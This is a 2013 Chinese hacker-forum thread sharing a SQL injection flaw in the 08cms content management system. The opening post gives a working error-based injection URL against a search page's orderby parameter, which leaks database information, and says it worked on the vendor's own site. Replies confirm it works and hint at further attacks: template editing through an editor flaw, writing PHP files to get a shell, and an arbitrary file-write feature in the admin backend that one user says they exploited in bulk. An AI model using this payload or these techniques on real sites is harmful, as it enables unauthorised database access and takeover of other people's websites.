搜索
查看: 919|回复: 2

08cms 注入漏洞

[复制链接]

432

主题

573

帖子

2543

积分

核心成员

Rank: 8Rank: 8

积分
2543
发表于 2013-10-10 16:44:08 | 显示全部楼层 |阅读模式
以前看到的,测试下官网还可以。网上看到还没有,大牛们估计早收好了。
可能是没有开源漏洞挺多的。
http://www.8090sec.com/search.ph ... rderby=aid%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&addno=0&ccid8=366
众说纷纭:测试成功。>>>>>> 貌似还有个编辑器的漏洞。。 >>>>>>  iis6和apache可以编辑模板。其他没试过。 >>>>> 刚碰到了个08cms, 感谢分享。>>>>> 日烂了,getshell 哪里需要解析。直接写入PHP文件 >>>>>> 日烂了,getshell 哪里需要解析。直接写入PHP文件 >>>>> 偶尔碰到过,房产版的有的已经补了,不过官方的没去看过... >>>>> 不开源的估计东东很多。 >>>>>  后台那里有个地方可以把文件名 写入到任意目录任意文件的。去年批量过一次,你看下是先写入后修改还是直接新建。而且08cms分很多个类型。
您可以更新记录, 让好友们知道您在做什么...
854955425 该用户已被删除
发表于 2013-10-10 16:44:35 | 显示全部楼层
沙发!沙发!
专业回帖 该用户已被删除
发表于 2013-10-10 18:28:58 | 显示全部楼层
学习了,谢谢分享、、、
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表